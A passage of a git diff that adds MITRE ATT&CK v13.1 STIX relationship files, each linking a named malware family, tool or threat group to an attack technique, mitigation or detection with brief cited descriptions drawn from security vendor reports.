@@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--19bbe2ae-b64f-47d1-90d6-c65eb320dea2", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00789efc-c0c5-4bc2-96ad-9f893bf9c06d", + "type": "relationship", + "created": "2021-02-17T19:22:30.961Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason Conti Jan 2021", + "url": "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware", + "description": "Rochberger, L. (2021, January 12). Cybereason vs. Conti Ransomware. Retrieved February 17, 2021." + }, + { + "source_name": "CarbonBlack Conti July 2020", + "url": "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/", + "description": "Baskin, B. (2020, July 8). TAU Threat Discovery: Conti Ransomware. Retrieved February 17, 2021." + } + ], + "modified": "2021-04-14T12:56:37.287Z", + "description": "[Conti](https://attack.mitre.org/software/S0575) can spread via SMB and encrypts files on different hosts, potentially compromising an entire network.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)", + "relationship_type": "uses", + "source_ref": "malware--4dea7d8e-af94-4bfb-afe4-7ff54f59308b", + "target_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0078d802-53f2-4ee4-b802-492e9f121cbe.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0078d802-53f2-4ee4-b802-492e9f121cbe.json new file mode 100644 index 0000000000000000000000000000000000000000..2ccbe8e84a0e7941ef4e191bc05bd0a387e55693 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0078d802-53f2-4ee4-b802-492e9f121cbe.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--dec81ec6-4e26-4667-bce6-643a4e800424", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0078d802-53f2-4ee4-b802-492e9f121cbe", + "created": "2022-09-23T20:54:01.914Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Bitdefender FunnyDream Campaign November 2020", + "description": "Vrabie, V. (2020, November). Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions. Retrieved September 19, 2022.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-10T16:50:25.056Z", + "description": "During [FunnyDream](https://attack.mitre.org/campaigns/C0007), [ccf32](https://attack.mitre.org/software/S1043) was used to collect data.(Citation: Bitdefender FunnyDream Campaign November 2020)", + "relationship_type": "uses", + "source_ref": "campaign--8d2bc130-89fe-466e-a4f9-6bce6129c2b8", + "target_ref": "malware--a394448a-4576-41b8-81cc-9b61abad94ab", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--007cc21a-685a-4701-99c1-20f258cedc7c.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--007cc21a-685a-4701-99c1-20f258cedc7c.json new file mode 100644 index 0000000000000000000000000000000000000000..5954d7e63733a4c5c3095da40491c9ffa5dd41f4 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--007cc21a-685a-4701-99c1-20f258cedc7c.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--3bb7cfc5-d757-409b-90f8-65d404edde16", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--007cc21a-685a-4701-99c1-20f258cedc7c", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "FireEye APT17", + "description": "FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.", + "url": "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf" + } + ], + "modified": "2020-03-17T19:06:43.759Z", + "description": "[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has the capability to enumerate files.(Citation: FireEye APT17)", + "relationship_type": "uses", + "source_ref": "malware--d69c8146-ab35-4d50-8382-6fc80e641d43", + "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00814703-3c3b-4872-89e9-cea4ba5edf2d.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00814703-3c3b-4872-89e9-cea4ba5edf2d.json new file mode 100644 index 0000000000000000000000000000000000000000..1696283a834efcc95886ec68173a38136369d97e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00814703-3c3b-4872-89e9-cea4ba5edf2d.json 
@@ -0,0 +1,22 @@ +{ + "type": "bundle", + "id": "bundle--f30798d8-9ba2-4cb5-9498-aa707aec6fd8", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00814703-3c3b-4872-89e9-cea4ba5edf2d", + "type": "relationship", + "created": "2020-02-11T20:36:06.423Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2020-02-11T20:36:06.423Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e", + "target_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00822c6a-a881-4678-8d74-6a52b2ca27c9.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00822c6a-a881-4678-8d74-6a52b2ca27c9.json new file mode 100644 index 0000000000000000000000000000000000000000..69e9ddfbb35fe7a8f435733f6323c34dc6f2f82a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00822c6a-a881-4678-8d74-6a52b2ca27c9.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--4aa02b6d-f36f-4cdf-8035-308770b29667", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00822c6a-a881-4678-8d74-6a52b2ca27c9", + "type": "relationship", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://github.com/n1nj4sec/pupy", + "description": "Nicolas Verdier. (n.d.). Retrieved January 29, 2018.", + "source_name": "GitHub Pupy" + } + ], + "modified": "2019-04-24T17:52:47.933Z", + "description": "[Pupy](https://attack.mitre.org/software/S0192) uses [PsExec](https://attack.mitre.org/software/S0029) to execute a payload or commands on a remote host.(Citation: GitHub Pupy)", + "relationship_type": "uses", + "source_ref": "tool--cb69b20d-56d0-41ab-8440-4a4b251614d4", + "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0082e86b-a7b7-496b-af03-88785b6c8fbb.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0082e86b-a7b7-496b-af03-88785b6c8fbb.json new file mode 100644 index 0000000000000000000000000000000000000000..25d9a1f9e11f4a9120052546aff1d1fe01e15497 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0082e86b-a7b7-496b-af03-88785b6c8fbb.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--7b9778b6-4151-41ce-966b-60abf51296ef", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0082e86b-a7b7-496b-af03-88785b6c8fbb", + "type": "relationship", + "created": "2021-12-06T15:43:24.481Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "US-CERT TA18-074A", + "description": "US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-074A" + } + ], + "modified": "2021-12-06T15:43:24.481Z", + "description": "[Dragonfly](https://attack.mitre.org/groups/G0035) has compressed data into .zip files prior to exfiltration.(Citation: US-CERT TA18-074A)", + "relationship_type": "uses", + "source_ref": "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1", + "target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00876444-466d-40fe-8de5-0c13fcd0ea1a.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00876444-466d-40fe-8de5-0c13fcd0ea1a.json new file mode 100644 index 0000000000000000000000000000000000000000..e90186a3b324063e4d18e920486a5a399d73fdb1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00876444-466d-40fe-8de5-0c13fcd0ea1a.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--08e30d6f-82f2-4feb-9acc-c4332c4ff544", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00876444-466d-40fe-8de5-0c13fcd0ea1a", + "type": "relationship", + "created": "2020-10-15T16:47:27.531Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-02-17T13:12:51.765Z", + "description": "Make sure that the HISTCONTROL environment variable is set to \u201cignoredups\u201d instead of \u201cignoreboth\u201d or \u201cignorespace\u201d.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3", + "target_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00914655-1a22-40ed-ae4d-6adb1a6acd35.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00914655-1a22-40ed-ae4d-6adb1a6acd35.json new file mode 100644 index 0000000000000000000000000000000000000000..8c8c3f86f3c1098685982d975732f24d969b9c5a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00914655-1a22-40ed-ae4d-6adb1a6acd35.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--519ea3f9-f59e-424b-8bd5-133005010248", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00914655-1a22-40ed-ae4d-6adb1a6acd35", + "type": "relationship", + "created": "2020-11-09T16:28:37.599Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Securelist Brazilian Banking Malware July 2020", + "url": "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", + "description": "GReAT. (2020, July 14). The Tetrade: Brazilian banking malware goes global. Retrieved November 9, 2020." + } + ], + "modified": "2020-11-09T16:28:37.599Z", + "description": "[Astaroth](https://attack.mitre.org/software/S0373) can store C2 information on cloud hosting services such as AWS and CloudFlare and websites like YouTube and Facebook.(Citation: Securelist Brazilian Banking Malware July 2020)", + "relationship_type": "uses", + "source_ref": "malware--edb24a93-1f7a-4bbf-a738-1397a14662c6", + "target_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00991be5-e2c2-4645-b743-e9e4af3d38b9.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00991be5-e2c2-4645-b743-e9e4af3d38b9.json new file mode 100644 index 0000000000000000000000000000000000000000..bfc709df29adfcaad938358119fbcb0da9ac525b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00991be5-e2c2-4645-b743-e9e4af3d38b9.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--b37cf429-2040-47a0-ba75-df26702fbaec", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00991be5-e2c2-4645-b743-e9e4af3d38b9", + "type": "relationship", + "created": "2021-05-20T14:35:48.636Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cobalt Strike Manual 4.3 November 2020", + "url": "https://web.archive.org/web/20210708035426/https://www.cobaltstrike.com/downloads/csmanual43.pdf", + "description": "Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021." + } + ], + "modified": "2021-10-18T19:54:13.384Z", + "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154) can use sudo to run a command.(Citation: Cobalt Strike Manual 4.3 November 2020)", + "relationship_type": "uses", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", + "target_ref": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00a88d6f-fa8c-48bf-a028-fb75ca04e000.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00a88d6f-fa8c-48bf-a028-fb75ca04e000.json new file mode 100644 index 0000000000000000000000000000000000000000..aa4ca56d8f1c87d50a0edead77c30825cda4e888 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00a88d6f-fa8c-48bf-a028-fb75ca04e000.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--0abac62c-b35f-4377-8ac9-c7e4ebb91a51", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00a88d6f-fa8c-48bf-a028-fb75ca04e000", + "type": "relationship", + "created": "2020-11-10T16:49:13.291Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "DFIR Ryuk 2 Hour Speed Run November 2020", + "url": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", + "description": "The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020." + } + ], + "modified": "2020-11-10T16:49:13.291Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) obtained a code signing certificate signed by Digicert for some of its malware.(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)", + "relationship_type": "uses", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "target_ref": "attack-pattern--e7cbc1de-1f79-48ee-abfd-da1241c65a15", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00aa618f-bcfa-4649-8436-134f9d01e43c.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00aa618f-bcfa-4649-8436-134f9d01e43c.json new file mode 100644 index 0000000000000000000000000000000000000000..15630718966392d347713571cb003283d75be1c7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00aa618f-bcfa-4649-8436-134f9d01e43c.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--81ea8a77-185e-454d-86cb-3ac89bb426d0", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00aa618f-bcfa-4649-8436-134f9d01e43c", + "type": "relationship", + "created": "2020-06-19T21:25:43.683Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.", + "source_name": "Cybereason Cobalt Kitty 2017" + } + ], + "modified": "2020-06-29T21:37:55.941Z", + "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to communicate with its C2 over DNS.(Citation: Cybereason Cobalt Kitty 2017)\t", + "relationship_type": "uses", + "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad", + "target_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ae99d1-db02-4007-8669-04d7fc4c1390.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ae99d1-db02-4007-8669-04d7fc4c1390.json new file mode 100644 index 0000000000000000000000000000000000000000..75b188062a6cf2549ea61599ae5e11dec5536531 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ae99d1-db02-4007-8669-04d7fc4c1390.json 
@@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--b442dfce-75b1-4b0b-bf35-eea7b79db548", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00ae99d1-db02-4007-8669-04d7fc4c1390", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ESET Sednit USBStealer 2014", + "description": "Calvet, J. (2014, November 11). Sednit Espionage Group Attacking Air-Gapped Networks. Retrieved January 4, 2017.", + "url": "http://www.welivesecurity.com/2014/11/11/sednit-espionage-group-attacking-air-gapped-networks/" + }, + { + "source_name": "Kaspersky Sofacy", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.", + "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" + } + ], + "modified": "2020-03-11T17:45:54.045Z", + "description": "Once a removable media device is inserted back into the first victim, [USBStealer](https://attack.mitre.org/software/S0136) collects data from it that was exfiltrated from a second victim.(Citation: ESET Sednit USBStealer 2014)(Citation: Kaspersky Sofacy)", + "relationship_type": "uses", + "source_ref": "malware--af2ad3b7-ab6a-4807-91fd-51bcaff9acbb", + "target_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00b0af92-df59-4d56-ac3e-18f6f1f72957.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00b0af92-df59-4d56-ac3e-18f6f1f72957.json new file mode 100644 index 0000000000000000000000000000000000000000..c37ee6e8394ab0896b27969178f2e3b25666c91d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00b0af92-df59-4d56-ac3e-18f6f1f72957.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--6c619a31-48ab-47ea-8579-b735b6971b1e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00b0af92-df59-4d56-ac3e-18f6f1f72957", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://securelist.com/the-flame-questions-and-answers-51/34344/", + "description": "Gostev, A. (2012, May 28). The Flame: Questions and Answers. Retrieved March 1, 2017.", + "source_name": "Kaspersky Flame" + } + ], + "modified": "2019-06-06T14:35:54.017Z", + "description": "[Flame](https://attack.mitre.org/software/S0143) contains modules to infect USB sticks and spread laterally to other Windows systems the stick is plugged into using Autorun functionality.(Citation: Kaspersky Flame)", + "relationship_type": "uses", + "source_ref": "malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498", + "target_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00b0b6ec-a9eb-4fdd-b7ea-6e6c8a8ab1fc.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00b0b6ec-a9eb-4fdd-b7ea-6e6c8a8ab1fc.json new file mode 100644 index 0000000000000000000000000000000000000000..b89324a989e135d680749f5352a51b4269a73fa3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00b0b6ec-a9eb-4fdd-b7ea-6e6c8a8ab1fc.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--ca73187d-3d68-4038-8774-ba9f23f1b23c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00b0b6ec-a9eb-4fdd-b7ea-6e6c8a8ab1fc", + "type": "relationship", + "created": "2019-11-27T14:58:00.679Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://technet.microsoft.com/library/dn221960.aspx", + "description": "Microsoft. (2013, May 8). Increase scheduling priority. Retrieved December 18, 2017.", + "source_name": "TechNet Scheduling Priority" + } + ], + "modified": "2020-12-30T14:26:44.885Z", + "description": "Configure the Increase Scheduling Priority option to only allow the Administrators group the rights to schedule a priority process. This can be configured through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Increase scheduling priority. (Citation: TechNet Scheduling Priority)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9bb9e696-bff8-4ae1-9454-961fc7d91d5f", + "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ba134e-1833-4dde-bf4e-7ec45271e8a6.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ba134e-1833-4dde-bf4e-7ec45271e8a6.json new file mode 100644 index 0000000000000000000000000000000000000000..747eb937451faafaf077fd3350acb4f52be412b3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ba134e-1833-4dde-bf4e-7ec45271e8a6.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--76b36ce3-1fa2-4807-b584-e8b56e180ad1", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00ba134e-1833-4dde-bf4e-7ec45271e8a6", + "type": "relationship", + "created": "2021-04-01T21:13:03.597Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Marschalek, M.. (2014, December 16). EvilBunny: Malware Instrumented By Lua. Retrieved June 28, 2019.", + "url": "https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/", + "source_name": "Cyphort EvilBunny Dec 2014" + } + ], + "modified": "2021-04-01T21:13:03.597Z", + "description": "[EvilBunny](https://attack.mitre.org/software/S0396) has used various API calls as part of its checks to see if the malware is running in a sandbox.(Citation: Cyphort EvilBunny Dec 2014)\t", + "relationship_type": "uses", + "source_ref": "malware--a8a778f5-0035-4870-bb25-53dc05029586", + "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00c4456d-cea9-43bf-913b-ec566699ce61.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00c4456d-cea9-43bf-913b-ec566699ce61.json new file mode 100644 index 0000000000000000000000000000000000000000..5d9126eb6bc197d534ae3e7cd9a8976ed223e76d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00c4456d-cea9-43bf-913b-ec566699ce61.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--afa67681-fa67-4588-a698-9d6e377e9fa2", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00c4456d-cea9-43bf-913b-ec566699ce61", + "type": "relationship", + "created": "2020-08-20T18:47:28.174Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-11T17:38:16.986Z", + "description": "Limit permissions to discover cloud infrastructure in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317", + "target_ref": "attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00c61f2d-f55e-4257-b92c-682352feb37d.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00c61f2d-f55e-4257-b92c-682352feb37d.json new file mode 100644 index 0000000000000000000000000000000000000000..f963719865c6ef4701ab6d1655b1b8e637b36e8f --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00c61f2d-f55e-4257-b92c-682352feb37d.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--30ccff43-b487-4b2c-8dec-4aaae6119ff5", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00c61f2d-f55e-4257-b92c-682352feb37d", + "type": "relationship", + "created": "2022-03-30T14:26:51.850Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.850Z", + "description": "Monitor newly executed processes that may set files and directories to be hidden to evade detection mechanisms.", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "relationship_type": "detects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git 